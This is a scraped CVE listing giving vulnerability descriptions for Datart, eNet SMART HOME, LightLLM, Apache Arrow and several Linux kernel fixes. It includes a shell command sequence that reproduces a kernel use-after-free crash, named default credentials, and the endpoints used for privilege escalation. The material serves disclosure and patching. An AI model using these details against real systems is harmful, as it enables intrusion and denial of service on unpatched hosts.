| CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
| An information exposure vulnerability in Datart v1.0.0-rc.3 allows authenticated attackers to access sensitive data via a custom H2 JDBC connection string. |
| A Reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIAvpm Web Access from ENOVIAvpm Version 1 Release 16 through ENOVIAvpm Version 1 Release 19 allows an attacker to execute arbitrary script code in user's browser session. |
| A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. Affected by this vulnerability is an unknown functionality of the file /OutsideCmd. The manipulation results in weak password recovery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. It is recommended to upgrade the affected component. |
| The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site. |
| LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution. |
| A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field. |
| eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default credentials to gain administrative access to sensitive smart home configuration and control functions. |
| eNet SMART HOME server 2.2.1 and 2.3.1 contains a missing authorization vulnerability in the resetUserPassword JSON-RPC method that allows any authenticated low-privileged user (UG_USER) to reset the password of arbitrary accounts, including those in the UG_ADMIN and UG_SUPER_ADMIN groups, without supplying the current password or having sufficient privileges. By sending a crafted JSON-RPC request to /jsonrpc/management, an attacker can overwrite existing credentials, resulting in direct account takeover with full administrative access and persistent privilege escalation. |
| eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabilities such as modifying device configurations, network settings, and other smart home system functions. |
| Missing Authorization vulnerability in Smartypants SP Project & Document Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SP Project & Document Manager: from n/a through 4.70. |
| An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file. |
| An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration |
| Use After Free vulnerability in Apache Arrow C++.
This issue affects Apache Arrow C++ from 15.0.0 through 23.0.0. It can be triggered when reading an Arrow IPC file (but not an IPC stream) with pre-buffering enabled, if the IPC file contains data with variadic buffers (such as Binary View and String View data). Depending on the number of variadic buffers in a record batch column and on the temporal sequence of multi-threaded IO, a write to a dangling pointer could occur. The value (a `std::shared_ptr<Buffer>` object) that is written to the dangling pointer is not under direct control of the attacker.
Pre-buffering is disabled by default but can be enabled using a specific C++ API call (`RecordBatchFileReader::PreBufferMetadata`). The functionality is not exposed in language bindings (Python, Ruby, C GLib), so these bindings are not vulnerable.
The most likely consequence of this issue would be random crashes or memory corruption when reading specific kinds of IPC files. If the application allows ingesting IPC files from untrusted sources, this could plausibly be exploited for denial of service. Inducing more targeted kinds of misbehavior (such as confidential data extraction from the running process) depends on memory allocation and multi-threaded IO temporal patterns that are unlikely to be easily controlled by an attacker.
Advice for users of Arrow C++:
1. check whether you enable pre-buffering on the IPC file reader (using `RecordBatchFileReader::PreBufferMetadata`)
2. if so, either disable pre-buffering (which may have adverse performance consequences), or switch to Arrow 23.0.1 which is not vulnerable |
| In the Linux kernel, the following vulnerability has been resolved:
mm, shmem: prevent infinite loop on truncate race
When truncating a large swap entry, shmem_free_swap() returns 0 when the
entry's index doesn't match the given index due to lookup alignment. The
failure fallback path checks if the entry crosses the end border and
aborts when it happens, so truncate won't erase an unexpected entry or
range. But one scenario was ignored.
When `index` points to the middle of a large swap entry, and the large
swap entry doesn't go across the end border, find_get_entries() will
return that large swap entry as the first item in the batch with
`indices[0]` equal to `index`. The entry's base index will be smaller
than `indices[0]`, so shmem_free_swap() will fail and return 0 due to the
"base < index" check. The code will then call shmem_confirm_swap(), get
the order, check if it crosses the END boundary (which it doesn't), and
retry with the same index.
The next iteration will find the same entry again at the same index with
same indices, leading to an infinite loop.
Fix this by retrying with a round-down index, and abort if the index is
smaller than the truncate range. |
| In the Linux kernel, the following vulnerability has been resolved:
macvlan: fix error recovery in macvlan_common_newlink()
valis provided a nice repro to crash the kernel:
ip link add p1 type veth peer p2
ip link set address 00:00:00:00:00:20 dev p1
ip link set up dev p1
ip link set up dev p2
ip link add mv0 link p2 type macvlan mode source
ip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20
ping -c1 -I p1 1.2.3.4
He also gave a very detailed analysis:
<quote valis>
The issue is triggered when a new macvlan link is created with
MACVLAN_MODE_SOURCE mode and MACVLAN_MACADDR_ADD (or
MACVLAN_MACADDR_SET) parameter, lower device already has a macvlan
port and register_netdevice() called from macvlan_common_newlink()
fails (e.g. because of the invalid link name).
In this case macvlan_hash_add_source is called from
macvlan_change_sources() / macvlan_common_newlink():
This adds a reference to vlan to the port's vlan_source_hash using
macvlan_source_entry.
vlan is a pointer to the priv data of the link that is being created.
When register_netdevice() fails, the error is returned from
macvlan_newlink() to rtnl_newlink_create():
if (ops->newlink)
err = ops->newlink(dev, ¶ms, extack);
else
err = register_netdevice(dev);
if (err < 0) {
free_netdev(dev);
goto out;
}
and free_netdev() is called, causing a kvfree() on the struct
net_device that is still referenced in the source entry attached to
the lower device's macvlan port.
Now all packets sent on the macvlan port with a matching source mac
address will trigger a use-after-free in macvlan_forward_source().
</quote valis>
With all that, my fix is to make sure we call macvlan_flush_sources()
regardless of @create value whenever "goto destroy_macvlan_port;"
path is taken.
Many thanks to valis for following up on this issue. |
| In the Linux kernel, the following vulnerability has been resolved:
dmaengine: mmp_pdma: Fix race condition in mmp_pdma_residue()
Add proper locking in mmp_pdma_residue() to prevent use-after-free when
accessing descriptor list and descriptor contents.
The race occurs when multiple threads call tx_status() while the tasklet
on another CPU is freeing completed descriptors:
CPU 0 CPU 1
----- -----
mmp_pdma_tx_status()
mmp_pdma_residue()
-> NO LOCK held
list_for_each_entry(sw, ..)
DMA interrupt
dma_do_tasklet()
-> spin_lock(&desc_lock)
list_move(sw->node, ...)
spin_unlock(&desc_lock)
| dma_pool_free(sw) <- FREED!
-> access sw->desc <- UAF!
This issue can be reproduced when running dmatest on the same channel with
multiple threads (threads_per_chan > 1).
Fix by protecting the chain_running list iteration and descriptor access
with the chan->desc_lock spinlock. |
| In the Linux kernel, the following vulnerability has been resolved:
btrfs: sync read disk super and set block size
When the user performs a btrfs mount, the block device is not set
correctly. The user sets the block size of the block device to 0x4000
by executing the BLKBSZSET command.
Since the block size change also changes the mapping->flags value, this
further affects the result of the mapping_min_folio_order() calculation.
Let's analyze the following two scenarios:
Scenario 1: Without executing the BLKBSZSET command, the block size is
0x1000, and mapping_min_folio_order() returns 0;
Scenario 2: After executing the BLKBSZSET command, the block size is
0x4000, and mapping_min_folio_order() returns 2.
do_read_cache_folio() allocates a folio before the BLKBSZSET command
is executed. This results in the allocated folio having an order value
of 0. Later, after BLKBSZSET is executed, the block size increases to
0x4000, and the mapping_min_folio_order() calculation result becomes 2.
This leads to two undesirable consequences:
1. filemap_add_folio() triggers a VM_BUG_ON_FOLIO(folio_order(folio) <
mapping_min_folio_order(mapping)) assertion.
2. The syzbot report [1] shows a null pointer dereference in
create_empty_buffers() due to a buffer head allocation failure.
Synchronization should be established based on the inode between the
BLKBSZSET command and read cache page to prevent inconsistencies in
block size or mapping flags before and after folio allocation.
[1]
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:create_empty_buffers+0x4d/0x480 fs/buffer.c:1694
Call Trace:
folio_create_buffers+0x109/0x150 fs/buffer.c:1802
block_read_full_folio+0x14c/0x850 fs/buffer.c:2403
filemap_read_folio+0xc8/0x2a0 mm/filemap.c:2496
do_read_cache_folio+0x266/0x5c0 mm/filemap.c:4096
do_read_cache_page mm/filemap.c:4162 [inline]
read_cache_page_gfp+0x29/0x120 mm/filemap.c:4195
btrfs_read_disk_super+0x192/0x500 fs/btrfs/volumes.c:1367 |
| In the Linux kernel, the following vulnerability has been resolved:
cgroup/dmem: fix NULL pointer dereference when setting max
An issue was triggered:
BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: Oops: 0000 [#1] SMP NOPTI
CPU: 15 UID: 0 PID: 658 Comm: bash Tainted: 6.19.0-rc6-next-2026012
Tainted: [O]=OOT_MODULE
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
RIP: 0010:strcmp+0x10/0x30
RSP: 0018:ffffc900017f7dc0 EFLAGS: 00000246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff888107cd4358
RDX: 0000000019f73907 RSI: ffffffff82cc381a RDI: 0000000000000000
RBP: ffff8881016bef0d R08: 000000006c0e7145 R09: 0000000056c0e714
R10: 0000000000000001 R11: ffff888107cd4358 R12: 0007ffffffffffff
R13: ffff888101399200 R14: ffff888100fcb360 R15: 0007ffffffffffff
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000105c79000 CR4: 00000000000006f0
Call Trace:
<TASK>
dmemcg_limit_write.constprop.0+0x16d/0x390
? __pfx_set_resource_max+0x10/0x10
kernfs_fop_write_iter+0x14e/0x200
vfs_write+0x367/0x510
ksys_write+0x66/0xe0
do_syscall_64+0x6b/0x390
entry_SYSCALL_64_after_hwframe+0x76/0x7e
RIP: 0033:0x7f42697e1887
It was trriggered setting max without limitation, the command is like:
"echo test/region0 > dmem.max". To fix this issue, add check whether
options is valid after parsing the region_name. |
| In the Linux kernel, the following vulnerability has been resolved:
hwmon: (acpi_power_meter) Fix deadlocks related to acpi_power_meter_notify()
The acpi_power_meter driver's .notify() callback function,
acpi_power_meter_notify(), calls hwmon_device_unregister() under a lock
that is also acquired by callbacks in sysfs attributes of the device
being unregistered which is prone to deadlocks between sysfs access and
device removal.
Address this by moving the hwmon device removal in
acpi_power_meter_notify() outside the lock in question, but notice
that doing it alone is not sufficient because two concurrent
METER_NOTIFY_CONFIG notifications may be attempting to remove the
same device at the same time. To prevent that from happening, add a
new lock serializing the execution of the switch () statement in
acpi_power_meter_notify(). For simplicity, it is a static mutex
which should not be a problem from the performance perspective.
The new lock also allows the hwmon_device_register_with_info()
in acpi_power_meter_notify() to be called outside the inner lock
because it prevents the other notifications handled by that function
from manipulating the "resource" object while the hwmon device based
on it is being registered. The sending of ACPI netlink messages from
acpi_power_meter_notify() is serialized by the new lock too which
generally helps to ensure that the order of handling firmware
notifications is the same as the order of sending netlink messages
related to them.
In addition, notice that hwmon_device_register_with_info() may fail
in which case resource->hwmon_dev will become an error pointer,
so add checks to avoid attempting to unregister the hwmon device
pointer to by it in that case to acpi_power_meter_notify() and
acpi_power_meter_remove(). |
| In the Linux kernel, the following vulnerability has been resolved:
rust_binder: correctly handle FDA objects of length zero
Fix a bug where an empty FDA (fd array) object with 0 fds would cause an
out-of-bounds error. The previous implementation used `skip == 0` to
mean "this is a pointer fixup", but 0 is also the correct skip length
for an empty FDA. If the FDA is at the end of the buffer, then this
results in an attempt to write 8-bytes out of bounds. This is caught and
results in an EINVAL error being returned to userspace.
The pattern of using `skip == 0` as a special value originates from the
C-implementation of Binder. As part of fixing this bug, this pattern is
replaced with a Rust enum.
I considered the alternate option of not pushing a fixup when the length
is zero, but I think it's cleaner to just get rid of the zero-is-special
stuff.
The root cause of this bug was diagnosed by Gemini CLI on first try. I
used the following prompt:
> There appears to be a bug in @drivers/android/binder/thread.rs where
> the Fixups oob bug is triggered with 316 304 316 324. This implies
> that we somehow ended up with a fixup where buffer A has a pointer to
> buffer B, but the pointer is located at an index in buffer A that is
> out of bounds. Please investigate the code to find the bug. You may
> compare with @drivers/android/binder.c that implements this correctly. |